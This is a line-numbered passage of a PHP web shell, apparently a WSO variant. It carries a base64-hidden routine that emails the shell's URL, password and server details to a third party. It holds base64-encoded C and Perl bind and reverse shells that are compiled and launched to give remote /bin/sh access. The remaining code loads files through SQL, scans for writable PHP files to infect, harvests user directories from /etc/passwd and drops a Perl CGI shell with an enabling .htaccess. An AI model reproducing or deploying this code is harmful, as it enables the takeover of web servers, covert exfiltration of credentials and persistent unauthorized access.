1363. echo '<tr class="l'.$line.'">';
1364. $line = $line==1?2:1;
1365. foreach($item as $key => $value) {
1366. if($value == null)
1367. echo '<td><i>null</i></td>';
1368. else
1369. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1370. }
1371. echo '</tr>';
1372. }
1373. echo '</table>';
1374. } else {
1375. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1376. }
1377. }
1378. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1379. echo "</td></tr>";
1380. }
1381. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1382. if(@$_POST['p1'] == 'loadfile') {
1383. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1384. $file = $db->fetch();
1385. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1386. }
1387. }
1388. echo '</div>';
1389. printFooter();
1390. }
1391. function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
1392. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
1393.  
1394. Uname: '.substr(@php_uname(), 0, 120).'
1395.  
1396. Pass: http://www.hashchecker.de/'.$auth_pass.'
1397.  
1398. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("RFowN19YX1RFQU1AWUFIT08uQ09N");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
1399.  
1400.  
1401. function actionNetwork() {
1402. printHeader();
1403. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1404. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1405. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1406. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1407. ?>
1408. <h1>Network tools</h1><div class=content>
1409. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1410. <span>Bind port to /bin/sh</span><br/>
1411. Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
1412. </form>
1413. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1414. <span>Back-connect to</span><br/>
1415. Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
1416. </form><br>
1417. <?php
1418. if(isset($_POST['p1'])) {
1419. function cf($f,$t) {
1420. $w=@fopen($f,"w") or @function_exists('file_put_contents');
1421. if($w) {
1422. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1423. @fclose($w);
1424. }
1425. }
1426. if($_POST['p1'] == 'bpc') {
1427. cf("/tmp/bp.c",$bind_port_c);
1428. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1429. @unlink("/tmp/bp.c");
1430. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1431. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1432. }
1433. if($_POST['p1'] == 'bpp') {
1434. cf("/tmp/bp.pl",$bind_port_p);
1435. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1436. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1437. }
1438. if($_POST['p1'] == 'bcc') {
1439. cf("/tmp/bc.c",$back_connect_c);
1440. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1441. @unlink("/tmp/bc.c");
1442. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1443. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1444. }
1445. if($_POST['p1'] == 'bcp') {
1446. cf("/tmp/bc.pl",$back_connect_p);
1447. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1448. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1449. }
1450. }
1451. echo '</div>';
1452. printFooter();
1453. }
1454.  
1455. function actionInfect() {
1456. printHeader();
1457. echo '<h1>Infect</h1><div class=content>';
1458. if($_POST['p1'] == 'infect') {
1459. $target=$_SERVER['DOCUMENT_ROOT'];
1460. function ListFiles($dir) {
1461. if($dh = opendir($dir)) {
1462. $files = Array();
1463. $inner_files = Array();
1464. while($file = readdir($dh)) {
1465. if($file != "." && $file != "..") {
1466. if(is_dir($dir . "/" . $file)) {
1467. $inner_files = ListFiles($dir . "/" . $file);
1468. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1469. } else {
1470. array_push($files, $dir . "/" . $file);
1471. }
1472. }
1473. }
1474. closedir($dh);
1475. return $files;
1476. }
1477. }
1478. foreach (ListFiles($target) as $key=>$file){
1479. $nFile = substr($file, -4, 4);
1480. if($nFile == ".php" ){
1481. if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1482. echo "$file<br>";
1483. $i++;
1484. }
1485. }
1486. }
1487. echo "<font color=red size=14>$i</font>";
1488. }else{
1489. echo "<form method=post><input type=submit value=Infect name=infet></form>";
1490. echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1491. }
1492. printFooter();
1493. }
1494.  
1495.  
1496. /* additional adds */
1497.  
1498. function actionReadable(){
1499. printHeader();
1500. echo '<h1>Subdomain</h1><div class=content>';
1501. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1502. set_time_limit(0);
1503. ###################
1504. @$passwd = fopen('/etc/passwd','r');
1505. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1506. $pub = array();
1507. $users = array();
1508. $conf = array();
1509. $i = 0;
1510. while(!feof($passwd))
1511. {
1512. $str = fgets($passwd);
1513. if ($i > 35)
1514. {
1515. $pos = strpos($str,':');
1516. $username = substr($str,0,$pos);
1517. $dirz = '/home/'.$username.'/public_html/';
1518. if (($username != ''))
1519. {
1520. if (is_readable($dirz))
1521. {
1522. array_push($users,$username);
1523. array_push($pub,$dirz);
1524. }
1525. }
1526. }
1527. $i++;
1528. }
1529. ###################
1530. echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
1531. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1532. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1533. echo "[~] Searching for passwords in config files...\n\n";
1534. foreach ($users as $user)
1535. {
1536. $path = "/home/$user/public_html/";
1537. echo "$path \n";
1538. }
1539. echo "\n";
1540. echo "[+] Done...\n";
1541. echo '</textarea><br></body></html>';
1542.  
1543. echo '</div>';
1544. printFooter();
1545. }
1546.  
1547. function actionCgiShell(){
1548. printHeader();
1549. echo '<h1>Cgitelnet</h1><div class=content>';
1550.  
1551. mkdir('cgitelnet1', 0755);
1552. chdir('cgitelnet1');
1553. $kokdosya = ".htaccess";
1554. $dosya_adi = "$kokdosya";
1555. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
1556. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1557.  
1558. AddType application/x-httpd-cgi .cin
1559.  
1560. AddHandler cgi-script .cin
1561. AddHandler cgi-script .cin";
1562. fwrite ( $dosya , $metin ) ;
1563. fclose ($dosya);
1564. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
1565. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1566. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
1567. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1568. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
1569. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1570. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
1571. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
1572. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1573. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
1574. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
1575. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
1576. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
1577. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
1578. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
1579. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
1580. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
1581. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
1582. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
1583. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
1584. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
1585. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
1586. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
1587. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
1588. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
1589. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
1590. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
1591. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
1592. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
1593. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
1594. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
1595. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
1596. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
1597. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
1598. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1599. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
1600. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
1601. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
1602. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
1603. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
1604. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
1605. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
1606. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1607. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
1608. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
1609. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
1610. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
1611. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
1612. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
1613. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
1614. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
1615. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
1616. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
1617. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
1618. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
1619. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
1620. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
1621. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
1622. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
1623. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
1624. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
1625. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
1626. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
1627. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
1628. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
1629. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
1630. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
1631. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
1632. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
1633. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
1634. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1635. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
1636. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
1637. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1638. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
1639. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
1640. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
1641. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
1642. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
1643. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
1644. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
1645. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
1646. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
1647. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
1648. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
1649. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
1650. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
1651. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
1652. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
1653. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
1654. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
1655. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
1656. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
1657. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
1658. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
1659. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
1660. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
1661. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
1662. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1663. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
1664. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1665. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
1666. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
